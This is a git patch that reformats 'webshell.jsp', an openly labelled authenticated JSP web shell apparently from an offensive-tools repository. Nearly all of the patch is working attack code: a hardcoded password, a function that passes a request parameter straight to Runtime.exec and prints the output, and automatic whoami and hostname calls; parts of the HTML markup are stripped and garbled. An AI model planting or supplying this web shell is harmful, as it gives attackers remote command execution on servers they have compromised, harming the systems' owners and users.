From f0f68868f39959a4adcca6535c7da749f618004d Mon Sep 17 00:00:00 2001 From: mgeeky Date: Fri, 28 Jun 2019 12:37:49 +0200 Subject: [PATCH] Webshell.jsp updated --- web/webshell.jsp | 112 +++++++++++++++++++++++------------------------ 1 file changed, 56 insertions(+), 56 deletions(-) diff --git a/web/webshell.jsp b/web/webshell.jsp index 1c1a713..b4eb185 100644 --- a/web/webshell.jsp +++ b/web/webshell.jsp @@ -5,79 +5,79 @@ <%! // ===================================================================== - // Setup global password necessary to pass before using that webshell. - public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r"; + // Setup global password necessary to pass before using that webshell. + public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r"; - // ===================================================================== + // ===================================================================== - public String execute(String pass, String cmd, Boolean skip) { - StringBuilder res = new StringBuilder(); + public String execute(String pass, String cmd, Boolean skip) { + StringBuilder res = new StringBuilder(); - if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){ - try { - Process proc = Runtime.getRuntime().exec(cmd); - OutputStream outs = proc.getOutputStream(); - InputStream ins = proc.getInputStream(); - DataInputStream datains = new DataInputStream(ins); - String datainsline = datains.readLine(); + if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){ + try { + Process proc = Runtime.getRuntime().exec(cmd); + OutputStream outs = proc.getOutputStream(); + InputStream ins = proc.getInputStream(); + DataInputStream datains = new DataInputStream(ins); + String datainsline = datains.readLine(); - while ( datainsline != null) { - res.append(datainsline + "
"); - datainsline = datains.readLine(); - } - } catch( IOException e) { - return "IOException: " + e.getMessage(); - } - } - else { - return "Wrong password or no command issued."; - } + while ( datainsline != null) { + res.append(datainsline + "
"); + datainsline = datains.readLine(); + } + } catch( IOException e) { + return "IOException: " + e.getMessage(); + } + } + else { + return "Wrong password or no command issued."; + } - String out = res.toString(); + String out = res.toString(); if (out != null && out.length() > 5 && out.indexOf("
") != -1) { out = out.substring(0, out.length() - 5); } out = out.replaceAll("(\r\n|\n\r|\n|\r)", "
"); return out; - } + } %> - - JSP Application - + + JSP Application + -

Authenticated JSP Webshell.

- You need to provide a valid password in order to leverage this application. -
- coded by mgeeky -
-
-
- +

Authenticated JSP Webshell.

+ You need to provide a valid password in order to leverage this application. +
+ coded by mgeeky +
+
+ +
- - - - - - - - - -
OS: <% out.print(System.getProperty("os.name")); %>
Password:
<% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%>
-
-
-
<%
-			if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
-				out.println("
server$ " + request.getParameter("cmd") + "
"); - out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false)); - } - %>
- - + + Password: + + + <% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%> + + + + + + +
+
<%
+            if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
+                out.println("
server$ " + request.getParameter("cmd") + "
"); + out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false)); + } + %>
+ +